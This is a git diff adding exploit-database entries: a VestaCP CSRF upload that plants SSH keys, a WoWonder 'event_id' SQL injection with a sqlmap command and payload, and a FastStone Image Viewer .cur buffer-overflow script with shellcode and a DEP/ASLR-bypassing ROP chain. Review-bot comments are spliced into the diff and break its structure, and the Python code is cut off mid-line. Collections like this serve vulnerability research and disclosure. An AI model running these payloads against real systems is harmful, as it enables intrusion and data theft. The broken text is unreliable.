diff --git a/exploits/multiple/webapps/49659.html b/exploits/multiple/webapps/49659.html
new file mode 100644
index 000000000..7de410c75
--- /dev/null
+++ b/exploits/multiple/webapps/49659.html
@@ -0,0 +1,50 @@
+# Exploit Title: VestaCP 0.9.8 - File Upload CSRF
+# Exploit Author: Fady Othman
+# Date: 16-03-2021
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://github.com/myvesta/vesta
+# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39
+# CVE ID: CVE-2021-28379
+# Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355
+
+## Description
+I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.
+
+I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.
+
+Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.
+
+Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"
+
+## Steps to reproduce.
+1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/.
+2. Login as the admin in Firefox, then open "exploit.html".
+3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin.
+
+# exploit.html
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
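Review bot: The header gives the patch commit but no fixed release, and the Description offers no remediation, which is what a reader triaging CVE-2021-28379 from this file needs first; the "Version:" line stops at "through 0.9.8-27" and "through 0.9.8-26-39". A line such as `# Fixed in: <release containing the linked patch commit — verify against the vendor changelog>` after the "Patch:" line would close that gap. The Description already states the two root causes (no CSRF protection on the upload, and a `dir` value accepted outside the intended upload area), so one sentence saying that a correct fix must confine `dir` to an allowlisted base directory and require an anti-CSRF token on the upload form would make the expected mitigation explicit for operators. The body under "# exploit.html" is blank in this rendering, so the HTML file itself cannot be reviewed here.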
diff --git a/exploits/php/webapps/49657.txt b/exploits/php/webapps/49657.txt
new file mode 100644
index 000000000..919999046
--- /dev/null
+++ b/exploits/php/webapps/49657.txt
@@ -0,0 +1,27 @@
+# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
+# Date: 16.03.2021
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://www.wowonder.com/
+# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
+# Version: < 3.1
+# Tested on: Linux/Windows
+
+DESCRIPTION
+
+In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.
+
+The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.
+Example:
+/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID
+
+if an attacker exploits this vulnerability, attacker may access private data in the database system.
+
+EXPLOITATION
+
+# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
+# Host: Target
+
+Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs
+
+Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
\ No newline at end of file
diff --git a/exploits/windows/local/49660.py b/exploits/windows/local/49660.py
new file mode 100755
index 000000000..776858b33
--- /dev/null
+++ b/exploits/windows/local/49660.py
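Review bot: The affected-version statement is inconsistent: the "Exploit Title:" line names version 3.1 while the "Version:" line and the first DESCRIPTION sentence say "< 3.1", so a reader cannot tell whether 3.1 is affected or is the fixed release. Either the title or the "Version:" line should change, and the "Tested on: Linux/Windows" line should name the application version that was actually tested, since that is the only fact the author can vouch for. The file also gives no remediation; a line such as `Remediation: treat event_id as an integer and bind it as a query parameter in requests.php; upgrade once the vendor confirms a fixed release` after the DESCRIPTION section would serve defenders reading this entry. The exact query affected is not shown, so that wording is inferred from the description and should be confirmed.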
@@ -0,0 +1,176 @@
+# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
+# Exploit Author: Paolo Stagno
+# Date: 15/03/2020
+# Vendor Homepage: https://www.faststone.org/
+# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe
+# https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/
+# Version: 7.5
+# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256
+# Category: local exploit
+# Platform: windows
+
+# Module info :
+#----------------------------------------------------------------------------------------------------------------------
+#Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
+#----------------------------------------------------------------------------------------------------------------------
+#0x00400000 | 0x00abf000 | 0x006bf000 | False | False | False | False | False | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe)
+#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False | False | False | False | False | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll)
+#0x6afb0000 | 0x6b011000 | 0x00061000 | True | True | False | False | False | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll)
+#----------------------------------------------------------------------------------------------------------------------
+
+#!/usr/bin/python
+import struct, sys
+print("\n[>] FastStone Image Viewer v. 
<= 7.5 Exploit by VoidSec\n")
+
+filename="FSViewer_v.7.5_exploit.cur"
+
+###################################################################################
+# Shellcode
+# MAX Shellcode size: 556
+# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556
+# Custom calc.exe shellcode
+# size: 112
+###################################################################################
+
+shellcode=(
+ "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+ "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+ "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+ "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+ "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+ "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+ "\x45\x81\x3e\x43\x72\x65\x61\x75"
+ "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+ "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+ "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+ "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+ "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+ "\x6c\x63\x89\xe2\x52\x52\x53\x53"
+ "\x53\x53\x53\x53\x52\x53\xff\xd7"
+)
+
+
+if (len(shellcode)>556):
+ sys.exit("Shellcode's size must be <= 556 bytes")
+
+###################################################################################
+# Cur File Format
+# ---------------------------------------------------------------------------------
+# | Reserved | Type | Image Count |
+# | 00 00 | 02 00 | 02 00 | <- CUR file will contains two images
+# Entries:
+# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset |
+# | 30 | 30 | 00 | 00 | 01 00 | 02 00 | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode
+# | 20 | 20 | 00 | 00 | 02 00 | 04 00 | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact)
+# 1st Image Info Header:
+# | Size | Width | Height | Planes | BitCount | Compression | ImageSize | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant |
+# | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00 | 89 30 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 
00 00 00 00 | 00 00 00 00 | 00 00 00 00 |
+# 1st ImageData(BLOB)
+# 2nd Image Info Header:
+# 2nd ImageData(BLOB)
+# ---------------------------------------------------------------------------------
+# BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow
+# its value can be modified but we need to account for two operations happening into the software.
+# - SHL 1, 89 = 0x200
+# - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file
+# we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes
+# ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d)
+###################################################################################
+
+image_data_pad = 776
+
+def create_rop_nop():
+ rop_gadgets = [
+ 0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ}
+ ]
+ return ''.join(struct.pack(' ebx
+ #[---INFO:gadgets_to_set_edx:---]
+ 0x004798db, # POP EDX ; RETN [FSViewer.exe]
+ 0x00000040, # 0x00000040-> edx
+ #[---INFO:gadgets_to_set_ecx:---]
+ 0x004c7832, # POP ECX ; RETN [FSViewer.exe]
+ 0x00991445, # &Writable location [FSViewer.exe]
+ #[---INFO:gadgets_to_set_edi:---]
+ 0x0040c3a8, # POP EDI ; RETN [FSViewer.exe]
+ 0x0057660b, # RETN (ROP NOP) [FSViewer.exe]
+ #[---INFO:gadgets_to_set_eax:---]
+ 0x00404243, # POP EAX ; RETN [FSViewer.exe]
+ 0x90909090, # nop
+ #[---INFO:pushad:---]
+ 0x6adc21bf, # PUSHAD # RETN [fsplugin05.dll]
+ ]
+ return ''.join(struct.pack('